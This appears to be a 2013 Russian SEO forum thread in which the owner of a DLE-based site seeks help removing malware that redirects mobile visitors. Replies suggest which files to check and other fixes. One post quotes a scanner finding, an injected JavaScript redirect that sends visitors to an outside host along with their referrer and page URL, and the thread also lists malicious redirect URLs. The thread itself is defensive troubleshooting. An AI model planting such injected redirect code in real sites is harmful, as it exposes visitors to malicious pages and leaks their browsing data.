Войти

Войти | Регистрация
Поиск по сайту
Вредоносный код на сайте
Поиск  Правила 
Seo форум » Поисковая оптимизация » Вопросы новичков
Страницы: 1 2 След.
Вредоносный код на сайте, Хорошо было бы устранить :)
#1
19 Апреля 2013 21:53
Всем доброго времени суток! В общем, такая вот проблема. Есть сайт, с января месяца постоянно попадает в категорию подозрительных сайтов, и в поиске Яндекса помечается вот таким вот текстом: "Сайт может угрожать безопасности вашего компьютера или мобильного устройства". Каждый раз, по результатам выборочной проверки, вредоносный код находится на одной и той же странице (самой посещаемой, но не главной).
Поговорил с платоном, он ответил:
Цитата
При посещении сайта с мобильных устройств, наши алгоритмы обнаружили код, автоматически перенаправляющий посетителей на следующие вредоносные ресурсы:
http://up-daters.ru/m.php?id=14316#_screen1,
http://ios.google.com.details-download.r632bgwsmo478vv29tlnjvy2tzdgfyz2fmfkjuuz3rhdmtixe.qooq1e.net/update.html

Я давным давно убрал подобные партнерки. И знать не могу, откуда взялись редиректы на эти ссылки. Скачал файлы сайта на компьютер, проверил их поиском (искал по ссылкам) ничего не нашел. Кто сталкивался с такой проблемой? Подскажите, где искать вредоносный код? Ибо я сталкиваюсь с такой проблемой первый раз. Буду благодарен!
Изменено: Vorobey - 19 Апреля 2013 22:01
Фан-cайт группы - «Ляпис Трубецкой»
#2
19 Апреля 2013 22:05
У вас сайт на DLE?
#3
19 Апреля 2013 22:06
motlik, да.
#4
19 Апреля 2013 22:09
Тогда ищите вредоносный код здесь:
/index.php
/engine/data/dbconfig.php
/engine/data/config.php
/engine/init.php
/engine/engine.php
/language/Russian/website.lng
#5
19 Апреля 2013 22:09
Какая версия движка у вас?
#6
19 Апреля 2013 22:10
motlik, спасибо. Сейчас буду искать. Версия 9.4.
#7
19 Апреля 2013 22:18
Была у меня такая зараза, только сайт на вордпресс. Когда заходили с телефона - редирект шел на сайт, предлогающий скачать новую версию браузера. Редирект шел через .htaccessПроблему решил так: закачал на комп полностью все файлы ( у меня было 3 сайта) - проверил антивирусом (Avira). Он нашел заразу и удалил. Поменял .htaccess на нужный с выставлением нужных прав на файл. Просто редактирование .htaccess ничего не давало - через пару минут он заменялся.
#8
19 Апреля 2013 22:26
Цитата
Vorobey пишет:
Ибо я сталкиваюсь с такой проблемой первый раз. Буду благодарен!
Вот только что до вас лечили сайт в соседней теме. Неужели сложно пройтись по темам, перед созданием своей.
Открой свой магазин за 5 минут, их товары, их обслуживание, с тебя только клиенты >>> РЕГИСТРАЦИЯ <<<
Скрин выплат по запросу.
Рефералам помощь.
#9
19 Апреля 2013 22:42
Тоже такое было, если нужно исправить и выличить пиши в ЛС
#10
19 Апреля 2013 23:13
Думаю вам следует обновить до 9.8 (и не придется искать вредоносный код). А также удалить все аватары пользователей сайта. Шел заливался через gif-аватар скорее всего. Погуглите "массовый взлом сайтов на dle tehApocalypse".
#11
19 Апреля 2013 23:15
Цитата
motlik пишет:
Думаю вам следует обновить до 9.8 (и не придется искать вредоносный код). А также удалить все аватары пользователей сайта. Шел заливался через gif-аватар скорее всего. Погуглите "массовый взлом сайтов на dle tehApocalypse".
чего ? каким образом ? чисто физически это не возможно
#12
20 Апреля 2013 00:10
Ребята, всем спасибо за ответы. Завтра уже, все проверю. И отпишусь.
#13
21 Апреля 2013 16:55
Цитата
Vorobey пишет:
Всем доброго времени суток! В общем, такая вот проблема. Есть сайт, с января месяца постоянно попадает в категорию подозрительных сайтов, и в поиске Яндекса помечается вот таким вот текстом: "Сайт может угрожать безопасности вашего компьютера или мобильного устройства". Каждый раз, по результатам выборочной проверки, вредоносный код находится на одной и той же странице (самой посещаемой, но не главной).
Поговорил с платоном, он ответил:
Цитата
При посещении сайта с мобильных устройств, наши алгоритмы обнаружили код, автоматически перенаправляющий посетителей на следующие вредоносные ресурсы:
http://up-daters.ru/m.php?id=14316#_screen1 (http://\"http://up-daters.ru/m.php?id=14316#_screen1\"),
http://ios.google.com.details-download.r632bgwsmo478vv29tlnjvy2tzdgfyz2fmfkjuuz3rhdmtixe.qooq1e.net/update.html (http://\"http://ios.google.com.details-download.r632bgwsmo478vv29tlnjvy2tzdgfyz2fmfkjuuz3rhdmtixe.qooq1e.net/update.html\")

Я давным давно убрал подобные партнерки. И знать не могу, откуда взялись редиректы на эти ссылки. Скачал файлы сайта на компьютер, проверил их поиском (искал по ссылкам) ничего не нашел. Кто сталкивался с такой проблемой? Подскажите, где искать вредоносный код? Ибо я сталкиваюсь с такой проблемой первый раз. Буду благодарен!
Была такая-же бяка написал на хост всё исправили и извенились! Ответ был извините была ddos атака на хостинг, Я им в ответ что-же вы ляди исправляли целую неделю пока я не заметил? Мы не можем уследить за каждым ресурсом, если бы Вы сообщили нам раньше, мы отреагировали бы сразу!
#14
21 Апреля 2013 21:49
Всем добрый вечер. Решил проверить сайт, как вы писали. В config, dbconfig и .htaccess ничего не нашел. Просканировал ещё раз через Касперского - тоже молчит. Искал по ссылкам через тотал командер - не нашел ничего. В тех файлах, что писал motlik тоже искал, но не нашел. Возможно, пропустил. Подскажите, точнее, что именно нужно искать? И где ещё может сидеть эта зараза? На хостинг пока что не писал. Эту тему - читал, ничего полезного не нашел. Не хочу пока что обновлять движок, так как куча модулей установлено, и я уже и не помню, где и что менял. Искал по тому коду, который ТС из соседней темы нашел, тоже ничег оне нашел. Есть ещё предложения?)
Изменено: Vorobey - 21 Апреля 2013 21:52
#15
21 Апреля 2013 22:48
Просканировал сайт через http://sucuri.net/. Написано:

Код
Anomaly behavior detected (possible malware). 
Details: http://sucuri.net/malware/malware-entry-mwanomalysp8
<script>window.location=("ht"+"tp:"+"//dledle.net/user/id?11&seo"+"ref="+encodeURIComponent(document.referrer)+ "&para"+"meter="+"word&se=&ur=1&HTTP_REFERER="+encodeURIComponent(document.URL));</script><!DOCTYPEhtml PUBLIC "-//W3C//DTD XHTML 1.0 Strict//RU" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

Все это, в http://site.ru/?do=register. Мне это мало о чем сказало, я проверил файл /modules/register.php - ничего не нашел.  Искал так же по всему сайту ссылку dledle.net - тоже не нашел.
 
Страницы: 1 2 След.
Похожие темы:
  01.12.2023 23:56  Совсем нет посетителей на сайте
  23.09.2023 11:44  Правильно ли сделано на сайте?
  22.07.2022 12:19  Как называется сервис по проверке оптимизации на сайте?
  06.05.2022 16:39  Нашел на своем сайте ссылки на порносайты
  21.01.2022 17:14  Навигация на сайте
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
22:27 LOSPOLLOS.COM - Конвертим по рецепту Хайзенберга. Dating, Mainstream, Binary Options 
12:39 2Index - быстрая индексация страниц сайта и обратных ссылок 
06:17 3snet - гемблинг, беттинг, форекс, бинарные опционы, майнинг 
11:46 SharkBoss - партнёрская программа для монетизации ЛЮБЫХ видов трафика (включая спам). 
23:10 Dao.AD: Монетизация и покупка Push/Pops/Inpage и Video трафика! 
21:20 Rotapost прикрыли! Чем пользоваться? 
00:23 Раскрутка форума 
23:28 Помогите с оценкой стоимости сайта 
18:38 Продажа аккаунтов HH.RU 
13:38 BIGPROXY.SHOP - Резидентные Ротационные Backconnect Proxy USA EUROPA MIX [Безлимитный трафик] 
13:16 PonyBit.ru - обменный пункт PonyBit.ru (Понибит.ру) 
12:46 Мобильные и Резидентные Прокси Для Соц Сетей | 3 Гб Бесплатно 
12:12 CryptoGraph — Анонимный обмен криптовалют без KYC и AML 
10:46 Linken Sphere – браузер-антидетект нового поколения 
13:08 Бесплатный майнинг Tether (USDT) 
10:29 С юмором по жизни! 
16:49 monetizer.agency – рекламная сеть для взрослого и развлекательного трафика. 100$ новому вебмастеру 
20:43 Добро пожаловать в цифровой мир... 
15:59 Про мясо 
23:09 ПП от PMS remote.team - 200$ за команду 
13:28 Компьютерная мышь 
Апдейты
  • Яндекс ИКС Яндекс выдача 23.11.2023 (727 дней назад)
  • Яндекс выдача Яндекс выдачаМониторинг апдейтов 01.04.2025 (232 дня назад)

     Доска объявлений
     Купить / Продать
     Работа / Услуги
Интересные темы
—  Ремонт электроплит в Москве.
—  Тот самый БОТ, который озвучивает голосом Жириновского.
—  Монетизация любого типа контента на YouTube. Adsense больше не нужен!
—  Развитие канала в Яндекс Дзен
—  Заработок на Рутубе 2025


Показать все

Интернет новости

Как понравиться Google?26.03
Как понравиться Google?

25.03 Telegram заблокировали в Испании

25.03 Власти РФ требуют от Telegram бороться с "не такими" новостями

23.03 Microsoft покупает рекламу в выдаче Google для раскрутки Bing

22.03 Google Gemini открыта для тестирования

21.03 Yahoo! продолжает "угрожать" своим новым поиском


Инструменты
Все инструменты

© Сервис анализа сайтов CY-PR.com 2008-2050